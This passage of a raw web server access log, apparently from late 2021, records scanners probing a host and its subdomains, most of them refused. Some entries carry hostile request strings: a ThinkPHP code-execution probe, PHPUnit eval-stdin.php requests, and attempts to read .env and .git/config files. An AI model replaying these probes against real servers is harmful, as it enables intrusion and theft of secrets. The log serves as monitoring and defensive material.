zgrab/0.x" "-" [30/Nov/2021:23:35:47 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.203.215] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Dec/2021:00:43:56 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Dec/2021:01:05:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Dec/2021:01:09:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.212.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Dec/2021:01:09:16 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.95.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Dec/2021:01:21:41 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [01/Dec/2021:01:21:42 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [01/Dec/2021:02:58:48 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.212.251] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Dec/2021:04:01:19 +0000] 444 - HEAD https 64.22.31.253 "/epa/scripts/win/nsepa_setup.exe" [Client 54.67.52.105] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Dec/2021:04:03:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [01/Dec/2021:04:26:35 +0000] 400 - GET http localhost "/3kNp" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:04:39:33 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:04:39:33 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:04:39:33 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:05:53:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Dec/2021:05:56:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 35.81.80.18] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [01/Dec/2021:05:58:47 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Dec/2021:05:58:47 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [01/Dec/2021:06:59:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.2] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [01/Dec/2021:07:31:03 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:07:31:03 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:07:47:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.42] [Length 0] [Gzip -] "-" "-" [01/Dec/2021:07:47:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.114] [Length 0] [Gzip -] "-" "-" [01/Dec/2021:07:47:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.114] [Length 0] [Gzip -] "-" "-" [01/Dec/2021:07:47:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "-" "-" [01/Dec/2021:07:47:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.42] [Length 252] [Gzip -] "-" "-" [01/Dec/2021:07:47:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "-" "-" [01/Dec/2021:08:25:11 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:08:25:11 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:08:25:11 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:08:26:54 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [01/Dec/2021:08:59:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 199.249.230.163] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [01/Dec/2021:08:59:57 +0000] 444 - OPTIONS https localhost "/" [Client 18.27.197.252] [Length 0] [Gzip -] "-" "-" [01/Dec/2021:08:59:58 +0000] 400 - - https localhost "-" [Client 199.249.230.162] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:09:00:01 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 193.32.126.151] [Length 0] [Gzip -] "-" "-" [01/Dec/2021:09:00:17 +0000] 400 - - https localhost "-" [Client 199.249.230.163] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:09:20:11 +0000] 400 - - http localhost "-" [Client 181.214.206.81] [Length 154] [Gzip -] "-" "-" [01/Dec/2021:09:28:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.67] [Length 0] [Gzip -] "-" "-" [01/Dec/2021:09:36:11 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.234] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Dec/2021:10:07:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [01/Dec/2021:12:53:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.208.48] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [01/Dec/2021:20:09:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.43] [Length 0] [Gzip -] "-" "-" [01/Dec/2021:20:09:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "-" "-" [01/Dec/2021:20:09:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [01/Dec/2021:20:18:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [01/Dec/2021:20:18:17 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [01/Dec/2021:20:53:17 +0000] 444 - GET https agent.moralanimal.net "/.git/config" [Client 5.2.73.66] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [01/Dec/2021:21:39:09 +0000] 400 - - http localhost "-" [Client 94.102.49.159] [Length 154] [Gzip -] "-" "-" [02/Dec/2021:00:05:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Dec/2021:00:10:57 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:00:19:57 +0000] 400 - - http localhost "-" [Client 94.102.49.159] [Length 154] [Gzip -] "-" "-" [02/Dec/2021:00:25:17 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:00:48:00 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.82] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Dec/2021:01:07:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Dec/2021:01:09:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 193.29.14.156] [Length 252] [Gzip -] "python-requests/2.26.0" "-" [02/Dec/2021:01:09:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.29.14.156] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [02/Dec/2021:01:10:42 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Dec/2021:01:11:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Dec/2021:01:14:11 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:01:32:13 +0000] 444 - GET https localhost "/" [Client 162.62.191.231] [Length 0] [Gzip -] "curl/7.64.1" "-" [02/Dec/2021:01:32:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 205.185.122.184] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [02/Dec/2021:01:59:44 +0000] 400 - - http localhost "-" [Client 94.102.49.159] [Length 154] [Gzip -] "-" "-" [02/Dec/2021:02:01:04 +0000] 444 - POST https 64.22.31.253 "/dns-query" [Client 170.106.38.62] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "-" [02/Dec/2021:02:39:19 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:02:39:19 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:02:40:51 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:03:35:18 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [02/Dec/2021:04:22:54 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:05:02:49 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:05:11:41 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:05:11:41 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:05:13:43 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [02/Dec/2021:05:21:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Dec/2021:05:25:12 +0000] 444 - GET https localhost "/" [Client 109.248.6.27] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [02/Dec/2021:05:51:26 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:07:09:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:07:44:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:08:37:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.184.237] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:08:55:23 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:08:55:24 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:08:56:53 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [02/Dec/2021:09:32:38 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:09:32:39 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:09:35:39 +0000] 400 - HEAD http localhost "/" [Client 161.35.4.114] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:09:35:40 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 161.35.4.114] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:40 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 161.35.4.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:41 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 161.35.4.114] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:41 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 161.35.4.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:41 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 161.35.4.114] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:41 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 161.35.4.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:42 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 161.35.4.114] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:42 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 161.35.4.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:42 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 161.35.4.114] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [02/Dec/2021:09:35:42 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 161.35.4.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [02/Dec/2021:09:35:42 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 161.35.4.114] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:42 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 161.35.4.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:43 +0000] 400 - GET http 64.22.31.253 "/gemini-iptv/vod.json" [Client 161.35.4.114] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:43 +0000] 444 - GET https 64.22.31.253 "/gemini-iptv/vod.json" [Client 161.35.4.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 161.35.4.114] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:35:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.4.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [02/Dec/2021:09:37:19 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.155] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Dec/2021:09:47:00 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Dec/2021:09:47:00 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [02/Dec/2021:09:51:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Dec/2021:09:55:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [02/Dec/2021:10:25:38 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:10:25:39 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:10:32:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [02/Dec/2021:10:32:16 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211202182901" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [02/Dec/2021:11:40:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.68] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:12:19:25 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [02/Dec/2021:12:19:25 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [02/Dec/2021:12:56:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.214.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Dec/2021:13:38:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 152.32.134.14] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:13:44:17 +0000] 444 - GET https gitlab.moralanimal.net "/users/sign_in" [Client 104.200.146.41] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:14:05:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Dec/2021:14:41:05 +0000] 444 - GET https gitlab.moralanimal.net "/users/sign_in" [Client 104.200.146.41] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:17:41:20 +0000] 444 - GET https gitlab.moralanimal.net "/users/sign_in" [Client 104.200.146.41] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:17:43:55 +0000] 444 - GET https gitlab.moralanimal.net "/users/sign_in" [Client 104.200.146.41] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:18:11:36 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [02/Dec/2021:18:13:04 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [02/Dec/2021:18:13:50 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [02/Dec/2021:19:15:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [02/Dec/2021:19:17:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [02/Dec/2021:19:18:33 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:19:18:33 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:19:18:41 +0000] 444 - GET https 139.162.113.11 "/" [Client 94.250.201.139] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91" "-" [02/Dec/2021:19:24:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Dec/2021:20:23:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [02/Dec/2021:20:34:13 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:20:34:14 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [02/Dec/2021:20:59:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.41] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:20:59:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.42] [Length 0] [Gzip -] "-" "-" [02/Dec/2021:20:59:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 